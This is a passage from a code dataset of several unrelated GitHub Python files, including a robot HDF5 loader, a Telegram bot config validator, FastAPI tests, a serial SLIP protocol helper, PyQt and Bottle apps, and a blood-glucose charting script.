np.logical_and(finger_sensors[1:, 0] > 0, good_states).astype(np.float32)\n# reward_table = good_states - (1 - good_states) * 0.02\n# rewards = []\n\n# for s_t in range(start_time, start_time + n_states - 1):\n# reward_slice = reward_table[s_t:]\n# discount = np.power(hparams['reward_discount'], np.arange(reward_slice.shape[0]))\n# rewards.append(np.sum(discount * reward_slice))\n# return images, actions, states, np.array(rewards).astype(np.float32)\n \n# if hparams['load_annotations']:\n# annotations = load_annotations(hf, file_metadata, hparams, hparams['cams_to_load'])[start_time:start_time + n_states]\n# return images, actions, states, annotations\n\n# return images, actions, states\n\n\nif __name__ == '__main__':\n import argparse\n from robonet.datasets import load_metadata\n import random\n import matplotlib.pyplot as plt\n import os\n\n parser = argparse.ArgumentParser(description=\"tests hdf5 data loader without tensorflow dataset wrapper\")\n parser.add_argument('file', type=str, help=\"path to hdf5 you want to load\")\n args = parser.parse_args()\n args.file = os.path.expanduser(args.file)\n \n assert 'hdf5' in args.file\n data_folder = os.path.dirname(args.file)\n meta_data = load_metadata(data_folder)\n hparams = HDF5Loader.default_hparams()\n\n file_handle = HDF5Loader(args.file, meta_data.get_file_metadata(args.file), hparams)\n import pdb; pdb.set_trace()\n print(file_handle)\n","repo_name":"Asap7772/widowx_control","sub_path":"widowx_envs/widowx_envs/utils/datautils/hdf5_loader.py","file_name":"hdf5_loader.py","file_ext":"py","file_size_in_byte":11820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25977091882","text":"import os\nimport re\n\n\ndef validate_env_values():\n data = dict(USER_THRESHOLD=os.getenv('USER_THRESHOLD'),\n ADMINISTRATOR_GROUP_ID=os.getenv('ADMINISTRATOR_GROUP_ID'),\n USERS_GROUP=os.getenv('USERS_GROUP'))\n\n pattern = r'[-+]?\\d+$'\n for key, value in data.items():\n if not value:\n exit(f'Значение {key} не установлено!')\n if not re.match(pattern, value):\n exit(f'{key} не целое число!')\n\n counter, admins, users = data.values()\n return int(counter), [int(admins)], [int(users)]\n","repo_name":"chip-chu/tg-bot-users","sub_path":"utils/validate_values.py","file_name":"validate_values.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"28346481451","text":"import pandas as pd\n\nfrom ayniy.utils import FeatureStore, Data\n\n\nif __name__ == '__main__':\n\n target_col = 'diabetes_mellitus'\n\n features = FeatureStore(\n feature_names=[\n '../input/feather/train_test.ftr',\n '../input/feather/count_null.ftr',\n '../input/feather/count_encoding.ftr',\n \"../input/feather/count_encoding_interact.ftr\",\n \"../input/feather/aggregation.ftr\",\n \"../input/feather/target_encoding.ftr\",\n ],\n target_col=target_col,\n )\n\n X_train_u = features.X_train\n y_train = features.y_train\n X_test_u = features.X_test\n\n fe_id_u = 'fe006'\n run_id = 'run021'\n N_FEATURES = 300\n\n X_train_u = Data.load(f'../input/pickle/X_train_{fe_id_u}.pkl')\n X_test_u = Data.load(f'../input/pickle/X_test_{fe_id_u}.pkl')\n fi = pd.read_csv(f'../output/importance/{run_id}-fi.csv')['Feature'][:N_FEATURES]\n X_train_u = X_train_u[fi]\n X_test_u = X_test_u[fi].reset_index(drop=True)\n X_train_u.columns = [f'u_{c}' for c in fi]\n X_test_u.columns = [f'u_{c}' for c in fi]\n\n fe_id = 'fe_siavrez'\n X_train = Data.load(f'../input/pickle/X_train_{fe_id}.pkl')\n X_test = Data.load(f'../input/pickle/X_test_{fe_id}.pkl')\n\n print(X_train.shape, X_train_u.shape)\n print(X_test.shape, X_test_u.shape)\n\n X_train = pd.concat([X_train, X_train_u], axis=1)\n X_test = pd.concat([X_test, X_test_u], axis=1)\n print(X_train.shape, X_test.shape)\n\n print(X_train.select_dtypes('category').columns)\n\n fe_name = 'fe009'\n Data.dump(X_train, f'../input/pickle/X_train_{fe_name}.pkl')\n Data.dump(X_test, f'../input/pickle/X_test_{fe_name}.pkl')\n Data.dump(y_train, f'../input/pickle/y_train_{fe_name}.pkl')\n","repo_name":"upura/widsdatathon2021","sub_path":"experiments/concat_files.py","file_name":"concat_files.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39813599061","text":"'''\n238. Product of Array Except Self\nLink: https://leetcode.com/problems/product-of-array-except-self/\n\nGiven an array nums of n integers where n > 1,\nreturn an array output such that output[i] is equal to\nthe product of all the elements of nums except nums[i].\n\nExample:\nInput: [1, 2, 3, 4]\nOutput: [24, 12, 8, 6]\n\nNote: Please solve it without division and in O(n).\n'''\n\n\ndef product_except_self(nums):\n ''' \n [Intuition]\n nums - [1, 2, 3, 4]\n\n left - [1, 1, 2, 6]\n right - [24, 12, 4, 1]\n\n Output: [24, 12, 8, 6]\n '''\n\n n = len(nums)\n\n left_products, right_products = [1] * n, [1] * n\n output = [1] * n\n\n # Get the products before the current index\n for i in range(1, n):\n left_products[i] = nums[i-1] * left_products[i-1]\n\n # Get the products after the current index\n for i in range(n-2, -1, -1):\n right_products[i] = nums[i+1] * right_products[i+1]\n\n # Multiply the multiples\n for i in range(n):\n output[i] = left_products[i] * right_products[i]\n\n return output\n\n\ndef product_except_self_v2(nums):\n n = len(nums)\n output = [1] * n\n\n for i in range(1, n):\n output[i] = nums[i-1] * output[i-1]\n\n right_product = 1\n\n for i in range(n-1, -1, -1):\n output[i] = output[i] * right_product\n right_product = right_product * nums[i]\n\n return output\n\n\nassert product_except_self([1, 2, 3, 4]) == [24, 12, 8, 6]\n","repo_name":"ErickMwazonga/sifu","sub_path":"arrays/general/products_except_self.py","file_name":"products_except_self.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"12197427000","text":"import CRC16CCITT\n\nSLIP_FRAME_START_CB = [0xFF, 0xFF, 0xFF, 0xFF, 0xFF]\nSLIP_FRAME_END = 0xC0\nSLIP_ESC = 0xDB\nSLIP_CUSTOM = 0x5A\nSLIP_ESC_START = 0xDE\nSLIP_ESC_END = 0xDC\nSLIP_ESC_ESC = 0xDD\nSLIP_ESC_CUSTOM = 0xDA\n\nSLIP_SMALLEST_ENCODE = 2\n\ns_esc =SLIP_ESC\ns_escEsc = [SLIP_ESC, SLIP_ESC_ESC]\ns_frameStart = SLIP_FRAME_START_CB\ns_escStart = [SLIP_ESC, SLIP_ESC_START]\ns_frameEnd = SLIP_FRAME_END\ns_escEnd = [SLIP_ESC, SLIP_ESC_END]\ns_custom = SLIP_CUSTOM\ns_escCustom = [SLIP_ESC, SLIP_ESC_CUSTOM]\n\n\ndef ReplaceEn_SlipProtocol(source_list, find_item, replace_list):\n dest_list=[]\n for i in range(0,len(source_list)):\n if(source_list[i] == find_item):\n dest_list.extend(replace_list)\n else:\n dest_list.append(source_list[i])\n return dest_list\n\n\ndef ReplaceDe_SlipProtocol(source_list, find_item, replace_list):\n dest_list=[]\n j = len(source_list)\n for i in range(0,len(source_list)):\n if i == j:\n pass\n elif(source_list[i] == find_item[0] and source_list[i+1] == find_item[1]):\n dest_list.append(replace_list)\n j = i+1\n else:\n dest_list.append(source_list[i])\n return dest_list\n\n\ndef Encode_SlipProtocol(to_encode_list):\n dest_list = SLIP_FRAME_START_CB[:]\n dest_list.extend(to_encode_list)\n return dest_list\n\n\ndef Decode_SlipProtocol(to_decode_list):\n ret_val = 0\n data_list = []\n dest_list = to_decode_list[:]\n checksum_received = dest_list.pop(-1)\n # Calculate XOR checksum for received data\n checksum_calc = 0x00\n # check the checksum for received data\n for value in dest_list:\n checksum_calc = checksum_calc ^ value\n if checksum_received == checksum_calc:\n # check the response code\n if dest_list[8] != 0x00:\n ret_val = 0x10\n data_list = dest_list[10:]\n else:\n data_list = []\n ret_val = 0x01\n return ret_val\n return ret_val, data_list\n\ndef Decode_FE_CommProtocol(to_decode_list):\n ret_val = 0\n data_list = []\n dest_list = to_decode_list[:]\n crc_high_received = dest_list.pop(-1)\n crc_low_received = dest_list.pop(-1)\n # Calculate XOR checksum for received data\n crc16_calcu = CRC16CCITT.CRC16_CCITT(dest_list)\n crc16_low = crc16_calcu & 0x00FF\n crc16_high = crc16_calcu >> 8\n\n # check the checksum for received data\n if crc16_low == crc_low_received and crc16_high == crc_high_received:\n ret_val = dest_list[4:6]\n data_list = dest_list[6:]\n else:\n data_list = []\n # 0x0001 indicate that CRC check is wrong\n ret_val = 0x0001\n return ret_val\n return ret_val, data_list\n\n# list1=[0,0,0,0,0xc0,0x84]\n# list2=Encode_SlipProtocol(list1)\n# print(list2)\n# list2 = [223,219, 220, 4, 2, 0, 198, 141,192]\n# list3=Decode_SlipProtocol(list2)\n# print(list3)","repo_name":"ppanzhang/service-tool","sub_path":"SlipProtocol.py","file_name":"SlipProtocol.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8567565121","text":"\nimport os, platform, logging\n\n# модули графики\nimport sys\nimport main_window\nimport buyer_window\nfrom PyQt5 import QtWidgets, uic, QtCore, QtGui\n# модули графики\n\n# модули базы данных\nimport DataManager\n# модули базы данных\n\n\nclass BuyerWindow():\n '''Класс графики одного покупателя'''\n def __init__(self, dat_manager, buyer_id):\n '''\n :param: dat_manager класс базы данных\n :param: buyer_id id покупателя\n '''\n self.buyer_id = buyer_id\n\n\n logging.debug(\"Запуск экрана данных покупателя\")\n self.dat_manager = DataManager.DataManager()\n\n self.setupUi(self)\n\n # Переопределяем конструктор класса\ndef disconnect(signal):\n try:\n signal.disconnect()\n except TypeError:\n pass\n\n\nclass MainWindow(QtWidgets.QMainWindow, main_window.Ui_MainWindow):\n\n class CurrentView:\n BUYERS = 12323\n def __init__(self):\n # Обязательно нужно вызвать метод супер класса\n QtWidgets.QMainWindow.__init__(self)\n\n logging.debug(\"Подключение к базе данных\")\n self.dat_manager = DataManager.DataManager()\n\n self.setupUi(self)\n\n self.current_view = None\n self.tableWidget_load_buyers()\n\n def open_buyer_win(self, row, column):\n id_buyers = self.tableWidget.item(row,0).text()\n buyer_win = BuyerWindow(self.dat_manager, id_buyers)\n buyer_win.show()\n buyer_win.setParent(self)\n\n\n\n\n def tableWidget_load_buyers(self, filters = None):\n '''Загружает в таблицу данные пользователей с фильтром или без него'''\n\n buyers = self.dat_manager.get_buyers(filters)\n if not self.current_view == MainWindow.CurrentView.BUYERS:\n disconnect(self.tableWidget.cellActivated)\n disconnect(self.lineEdit_filter.textChanged)\n disconnect(self.comboBox_filter.currentIndexChanged)\n\n self.tableWidget.setColumnCount(5)\n\n\n self.tableWidget.setHorizontalHeaderLabels([\"id\",\"name\",\"email\",\"address\", \"phone\"])\n self.tableWidget.setColumnWidth(0, 40)\n self.tableWidget.setColumnWidth(1, 200)\n self.tableWidget.setColumnWidth(2, 200)\n self.tableWidget.setColumnWidth(3, 200)\n self.tableWidget.setColumnWidth(4, 140)\n\n #определение comboBox\n self.comboBox_filter.clear()\n self.comboBox_filter.addItems((\"id\",\"name\",\"email\",\"address\", \"phone\"))\n\n self.tableWidget.cellActivated.connect(self.open_buyer_win)\n self.lineEdit_filter.textChanged.connect(self.filter)\n self.comboBox_filter.currentIndexChanged.connect(self.filter)\n\n\n self.current_view = MainWindow.CurrentView.BUYERS\n\n self.tableWidget.clear()\n self.tableWidget.setRowCount(len(buyers))\n for row, buyer in enumerate(buyers):\n self.tableWidget.setItem(row, 0, QtWidgets.QTableWidgetItem(str(buyer.id)))\n self.tableWidget.setItem(row, 1, QtWidgets.QTableWidgetItem(buyer.name))\n self.tableWidget.setItem(row, 2, QtWidgets.QTableWidgetItem(buyer.email))\n self.tableWidget.setItem(row, 3, QtWidgets.QTableWidgetItem(buyer.address))\n self.tableWidget.setItem(row, 4, QtWidgets.QTableWidgetItem(\", \".join(buyer.phones)))\n\n def filter(self):\n text_filter = self.lineEdit_filter.text()\n if text_filter == \"\":\n self.tableWidget_load_buyers()\n else:\n if self.current_view is MainWindow.CurrentView.BUYERS:\n column = self.comboBox_filter.currentText()\n self.tableWidget_load_buyers((column, text_filter))\n\n\n\n\ndef main():\n\n if platform.platform().startswith('Windows'): # определение куда сохранять логи\n\n logging_file = os.path.join(os.getenv('HOMEDRIVE'),os.getenv('HOMEPATH'), 'DMS.log')\n else:\n logging_file = os.path.join(os.getenv('HOME'), 'DMS.log')\n\n logging.basicConfig( # настройки для модуля записи логгов\n level=logging.DEBUG,\n format='%(asctime)s : %(levelname)s : %(message)s',\n filename=logging_file,\n filemode='w',\n )\n logging.debug(\"старт приложения\")\n\n app = QtWidgets.QApplication(sys.argv)\n\n w = MainWindow()\n w.show()\n\n sys.exit(app.exec_())\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Daniil-PD/Database_management_system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28562318984","text":"#!/usr/bin/env python3\nfrom pprint import pprint\nimport sys\nimport fileinput\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom xboomx.sqlitemgr import get_session, PathItem\n\n\ndef main():\n # get db type\n db_type = ''\n if len(sys.argv) > 1 and sys.argv[1] != \"--stats\":\n db_type = sys.argv[1]\n\n try:\n item = fileinput.input()[0]\n pprint(item)\n\n item = item.strip('\\n')\n\n session = get_session()\n try:\n dbitem = session.query(PathItem).filter_by(name=item).one()\n dbitem.count = dbitem.count + 1\n session.add(dbitem)\n except NoResultFound:\n dbi = PathItem(name=item, couunt=0)\n session.add(dbi)\n\n session.commit()\n session.close()\n\n print(item)\n except IndexError:\n # handle if one press Esc to exit dmenu, catch broken pipe\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"victorhaggqvist/xboomx","sub_path":"xboomx/bin/xboomx_update.py","file_name":"xboomx_update.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7958132261","text":"from fastapi.testclient import TestClient\nimport pytest\nfrom databases import Database\nfrom sqlalchemy import MetaData, Table, Column, String, create_engine, Integer\nfrom fastapi import status\n\nfrom main import flow_aggregation_app\nfrom app.settings import get_config, Config\nfrom app.settings import config\n\nfrom app.persistent_backend.database import get_db, get_raw_flow_events\n\nDATABASE_URL = config.test_database_url\n\ndatabase = None\nraw_flow_events = None\n\nclient = TestClient(flow_aggregation_app)\n\nPOST_URL_ENDPOINT = \"/flows\"\nGET_URL_ENDPOINT = \"/flows\"\n\ndatabase = Database(DATABASE_URL, force_rollback=True)\nmetadata = MetaData()\n\nraw_flow_events = Table(\n \"raw_flow_events\",\n metadata,\n Column(\"src_app\", String),\n Column(\"dest_app\", String),\n Column(\"vpc_id\", String),\n Column(\"hour\", String),\n Column(\"bytes_rx\", Integer),\n Column(\"bytes_tx\", Integer)\n)\n\n\n@pytest.fixture()\ndef create_test_database():\n engine = create_engine(\n DATABASE_URL, connect_args={\"check_same_thread\": False}\n )\n\n metadata.create_all(bind=engine)\n\n # Run the test suite\n yield\n\n # Drop test databases\n metadata.drop_all(engine)\n\n\ndef override_get_db():\n return database\n\n\ndef override_get_table():\n return raw_flow_events\n\n\nflow_aggregation_app.dependency_overrides[get_db] = override_get_db\nflow_aggregation_app.dependency_overrides[get_raw_flow_events] = override_get_table\n\n\n@pytest.fixture()\ndef setup_values_in_test_db(create_test_database):\n json_items = [\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 300, \"hour\": 1},\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 200, \"bytes_rx\": 600, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2}\n ]\n client.post(\n POST_URL_ENDPOINT,\n json=json_items,\n )\n\n\ndef test_get_flows(create_test_database, setup_values_in_test_db):\n expected_responses = {\n 'hour_1': [\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"hour\": 1, \"bytes_rx\": 500, \"bytes_tx\": 100},\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"hour\": 1, \"bytes_rx\": 900, \"bytes_tx\": 300}],\n 'hour_2': [\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-0\", \"hour\": 2, \"bytes_rx\": 500, \"bytes_tx\": 100},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"hour\": 2, \"bytes_rx\": 500, \"bytes_tx\": 100}],\n 'hour_3': []\n }\n\n # testing get responses\n response_hour_1 = client.get(GET_URL_ENDPOINT + \"?hour=1\")\n data_hour_1 = response_hour_1.json()\n\n assert response_hour_1.status_code == 200\n assert len(data_hour_1['items']) == 2\n assert data_hour_1['items'] == expected_responses['hour_1']\n\n response_hour_2 = client.get(GET_URL_ENDPOINT + \"?hour=2\")\n data_hour_2 = response_hour_2.json()\n\n assert response_hour_2.status_code == 200\n assert len(data_hour_2['items']) == 2\n assert data_hour_2['items'] == expected_responses['hour_2']\n\n response_hour_3 = client.get(GET_URL_ENDPOINT + \"?hour=3\")\n data_hour_3 = response_hour_3.json()\n\n assert response_hour_3.status_code == 200\n assert len(data_hour_3['items']) == 0\n assert data_hour_3['items'] == expected_responses['hour_3']\n\n # testing input query parameters\n res = client.get(GET_URL_ENDPOINT + \"?hour=five\")\n assert res.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY\n\n res = client.get(GET_URL_ENDPOINT + \"?hour\")\n assert res.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY\n\n\ndef test_unsupported_http_methods():\n response_put_method = client.put(POST_URL_ENDPOINT, json={})\n assert response_put_method.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n response_delete_method = client.delete(POST_URL_ENDPOINT, json={})\n assert response_delete_method.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n\ndef test_post_flows_request(create_test_database):\n json_items = [\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 300, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2}\n ]\n response = client.post(\n POST_URL_ENDPOINT,\n json=json_items,\n )\n assert response.status_code == status.HTTP_201_CREATED\n\n\ndef override_get_config():\n return Config(total_input_flow_events=1)\n\n\ndef test_post_flows_request_exception(create_test_database):\n flow_aggregation_app.dependency_overrides[get_config] = override_get_config\n json_items = [\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2},\n {\"src_app\": \"foo\", \"dest_app\": \"bar\", \"vpc_id\": \"vpc-0\", \"bytes_tx\": 100, \"bytes_rx\": 300, \"hour\": 1},\n {\"src_app\": \"baz\", \"dest_app\": \"qux\", \"vpc_id\": \"vpc-1\", \"bytes_tx\": 100, \"bytes_rx\": 500, \"hour\": 2}\n ]\n response = client.post(\n POST_URL_ENDPOINT,\n json=json_items,\n )\n assert response.status_code == 500\n assert response.json() == {'error_message': 'Too many flow objects are being registered', 'status_code': 406}\n\n flow_aggregation_app.dependency_overrides[get_config] = get_config","repo_name":"uthiramohan/aggregation_ws","sub_path":"tests/test_application.py","file_name":"test_application.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39373329447","text":"import csv\nimport numpy as np\nimport matplotlib\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.pyplot as plt\nimport six\nlist1 = []\nwith open('loan_data.csv') as loanData:\n reader1 = csv.reader(loanData)\n for column in loanData:\n list1.append([column.split(',')[0], column.split(',')[1]])\nlist1 = list1[1:]\nlist2 = []\nwith open('home_ownership_data.csv') as hoData:\n reader2 = csv.reader(hoData)\n for row in hoData:\n list2.append([row.split(',')[0], row.split(',')[1].rstrip()])\nlist2 = list2[1:]\nlist3 = []\nfor i in range(len(list1)):\n for j in range(len(list2)):\n if list1[i][0] == list2[j][0]:\n list3.append([list2[j][1], list1[i][1]])\nlistM = []\nlistO = []\nlistR = []\nfor z in range(len(list3)):\n if list3[z][0] == 'MORTGAGE':\n listM.append(list3[z][1])\n if list3[z][0] == 'OWN':\n listO.append(list3[z][1])\n if list3[z][0] == 'RENT':\n listR.append(list3[z][1])\nMortgage = 0\nRent = 0\nOwn = 0\nfor a in range(len(listM)):\n Mortgage = Mortgage+int(listM[a])\nfor b in range(len(listO)):\n Own = Own+int(listO[b])\nfor c in range(len(listR)):\n Rent = Rent+int(listR[c])\nMortgage = round(float(Mortgage)/len(listM),6)\nOwn = round(float(Own)/len(listO),6)\nRent = round(float(Rent)/len(listR),6)\nName = ['MORTGAGE', 'OWN', 'RENT']\nAverage = [Mortgage, Own, Rent]\nAll = [[0, 'MORTGAGE', Mortgage],[1,'OWN', Own], [2, 'RENT', Rent]]\nAll = np.array(All)\nfig, plt = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1,3]},figsize=(15,6))\nplt[1].bar(Name, Average, align='center', width=0.62)\nplt[1].set_title('Average loan amounts per home ownership')\nplt[1].set_xlabel('Home ownership')\nplt[1].set_ylabel('Average loan amount($)')\nplt[0].axis('off')\nplt[0].axis([0, 3, All.shape[0], -6])\ntable1 = plt[0].table(cellText=All, cellColours=[['#F0F0F0', '#F0F0F0', '#F0F0F0'], ['#FFFFFF', '#FFFFFF', '#FFFFFF'],\n ['#F0F0F0', '#F0F0F0', '#F0F0F0']],\n colLabels=['', 'home_ownership', 'loan_amnt'], loc='bottom', colWidths=[0.05, 0.4, 0.4], bbox=[0.0, 0.0, 1.0, 0.3])\ntable1.auto_set_font_size(False)\ntable1.set_fontsize(12.5)\nfor k, cell in six.iteritems(table1._cells):\n cell.set_edgecolor('none')\n cell.set_text_props(fontproperties=FontProperties(family='Arial'))\n if k[0] == 0:\n table1._cells[k]._loc='right'\n cell.set_text_props(fontproperties=FontProperties(weight='bold', family='Arial'))\n if k[1] == 0:\n cell.set_text_props(fontproperties=FontProperties(weight='bold', family='Arial'))\nplt[0].axhline(y=1, color='k')\nfig.show()","repo_name":"RitaWang0427/Rep01","sub_path":"MAIS202.py","file_name":"MAIS202.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3124350123","text":"from bottle import route, default_app, HTTPResponse, run, jinja2_view, url, get, post, request, html_escape,\\\n response, redirect, debug, jinja2_template, MultiDict, post\nfrom pony.orm import Database, Optional, Required, PrimaryKey, db_session, sql_debug, select\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mpd\nimport numpy as np\nfrom datetime import datetime\nfrom General import verify_password, decimalAverage, dateTimeStr, dbFileName\nimport pytz\nfrom io import BytesIO\nfrom pathlib import Path\n# import Sessions, HTTPCookie, System\nimport System\nimport sys\nimport time\n\ndbPath = Path(f'./db/meter.db')\n# dbPath = Path(dbFile)\ndb = Database()\n\nclass Readings(db.Entity):\n readingdate = PrimaryKey(str)\n avgreading = Optional(float)\nDATE = 0\nAVERAGE = 1\n\nclass Comments(db.Entity):\n date = PrimaryKey(str)\n reading = Optional(float)\n comment = Optional(str)\n\n\ndb.bind(provider='sqlite', filename=str(dbPath), create_db=False)\n# db.bind(provider='sqlite', filename=\"db/meter.db\", create_db=False)\ndb.generate_mapping(create_tables=False)\n\n# zulu = pytz.timezone('UTC')\npst = pytz.timezone(\"America/Vancouver\")\n\ndef renderChart(request):\n\n DateCombined = []\n CommentDateCombined = []\n DailyAverageCombined = []\n CommentCombined = []\n CommentReadingCombined = []\n\n dATE = 0\n aVERAGE = 1\n\n with db_session:\n qry = select((r.readingdate, r.avgreading) for r in Readings).order_by(1)\n try:\n recs = qry.fetch()\n except Exception as e:\n print(e)\n for rec in recs:\n dtdate, avg = rec\n dtdate = datetime.strptime(dtdate, \"%Y-%m-%d\")\n DateCombined.append(dtdate)\n DailyAverageCombined.append(avg)\n\n qry = select((c.date, c.reading, c.comment) for c in Comments).order_by(1)\n try:\n recs = qry.fetch()\n except Exception as e:\n print(e)\n for rec in recs:\n dtdate, reading, comment = rec\n dtdate = datetime.strptime(dtdate, \"%Y-%m-%d\")\n CommentDateCombined.append(dtdate)\n CommentReadingCombined.append(reading)\n CommentCombined.append(comment)\n\n DateCombined = mpd.date2num(DateCombined)\n CommentDateCombined = mpd.date2num(CommentDateCombined)\n\n fig, ax1 = plt.subplots()\n\n lineTarg = ax1.axhline(y=6, linewidth=4, color='k', label='Glucose Target Range')\n ax1.axhline(y=9, linewidth=4, color='k')\n\n background = 0.30\n\n lineCombined, = ax1.plot_date(DateCombined, DailyAverageCombined, label='Daily Blood Glucose', linestyle='-',\n linewidth=1, color='r', marker=None, tz=pst) #\n\n ax1.yaxis.grid(True, linewidth=1)\n\n for i in range(len(CommentDateCombined)):\n # text = f'<---{(CommentCombined[i], CommentDateCombined[i])}'\n text = f'<---{CommentCombined[i]}'\n # return pprint.pformat((text, CommentDateCombined[i], CommentAverageCombined[i]))\n ax1.annotate(text, (CommentDateCombined[i], CommentReadingCombined[i]), fontsize=14,\n color='b', weight='bold') # , rotation=0,\n#-------------------------\n DateRange = np.concatenate((DateCombined,))\n minDate = min(DateRange)\n maxDate = max(DateRange)\n ax1.set_xlim(minDate, maxDate)\n\n df = mpl.dates.DateFormatter('%b-%d', tz=pst)\n ax1.xaxis.set_major_formatter(df)\n ax1.tick_params(which='major', width=2.0, length=4.0) # , labelsize=10)\n xlocator = mpl.dates.DayLocator(tz=pst)\n ax1.xaxis.set_minor_locator(xlocator)\n\n plt.gcf().autofmt_xdate()\n\n z = np.polyfit(DateCombined, DailyAverageCombined, 2)\n # z = np.polynomial.chebyshev.chebfit(DateCombined, DailyAverageCombined, 2)\n p = np.poly1d(z)\n trendLine, = ax1.plot_date(DateCombined, p(DateCombined), 'k--', label='Trend Line')\n\n # ax1.legend(handles=[lineCombined, trendLine, lineTarg], loc='upper left') # , loc='lower right' 'best'\n ax1.legend(handles=[lineCombined, lineTarg, trendLine], loc='upper right') # , loc='lower right' 'best'\n\n plt.title('Average Daily Blood Glucose (Jardiance Trial)', loc='left')\n plt.title('William Trenker')\n #\n # sessionID = HTTPCookie.getSessionCookie(request)\n nowstr = System.getLastReadingDateStr()\n # nowstr = dateTimeStr(datetime.now(), \"America/Vancouver\")\n dbNow = f'({dbFileName}) last updated: {nowstr}'\n plt.title(dbNow, fontsize=10, loc='right')\n #\n ax1.set_xlabel('Date (2019 - 2020)') # Note that this won't work on plt or ax2\n ax1.set_ylabel('Blood Glucose (mmol/L)')\n\n fig.set_size_inches(16, 8.5)\n # fig.tight_layout()\n\n img = BytesIO()\n fig.savefig(img)\n img.seek(0)\n return img\n # return send_file(img, mimetype='image/png')\n\n@get('/', name='home')\n@get('/home', name=\"homepage\")\ndef home():\n respData = MultiDict(url=url, title='Blood Glucose')\n return jinja2_template('Home.jinja2', respData, template_lookup=['templates'])\n\n@get('/averages', name=\"averages\")\ndef averages():\n # sessionID = HTTPCookie.getSessionCookie(request)\n respData = dict(url=url, title='Blood Glucose', timestamp=time.time()) #, sessionID=sessionID)\n return jinja2_template('Averages.jinja2', respData, template_lookup=['templates'])\n\n@get('/chart', name='chart')\ndef chart():\n # log('chart', 'HTTPResponse')\n img = renderChart(request)\n resp = HTTPResponse(body=img, status=200)\n resp.set_header('content_type', 'image/png')\n return resp\n\napp = default_app()\n\n@app.error(404)\ndef error404handler(error):\n f = request.fullpath\n respData = MultiDict(dict(f=f))\n return jinja2_template('405.jinja2', respData, template_lookup=['templates'])\n\n@app.error(405)\ndef error405handler(error):\n f = request.fullpath\n respData = MultiDict(dict(f=f))\n return jinja2_template('405.jinja2', respData, template_lookup=['templates'])\n\n@app.error(500)\ndef error500handler(error):\n f = request.fullpath\n respData = MultiDict(dict(f=f))\n return jinja2_template('500.jinja2', template_lookup=['templates'])\n\n\n\nif __name__ == '__main__':\n run(host='localhost', port=8081, debug=True)\n# renderChart(request)\n","repo_name":"wtrenker/glucose-chart","sub_path":"ChartMeter.py","file_name":"ChartMeter.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40476452722","text":"from django.urls import path\nfrom django.contrib.auth.views import LoginView\nfrom . import views\n\nurlpatterns = [\n #index Page View\n path('', views.index, name='index'),\n #Login Page View\n path('donorlogin/', LoginView.as_view(template_name='pages-login.html'),name='pages-login'),\n #SignUp Page View\n path('donorsignup/', views.donor_signup_view,name='pages-register'),\n #Donation History Page View\n path('donation-history/', views.donation_history_view,name='donation-history'),\n #Questionnaire Page View\n path('questionnaire/', views.questionnare_view,name='questionnaire'),\n #Questionnaire Fail Page View\n path('questionnairefail/', 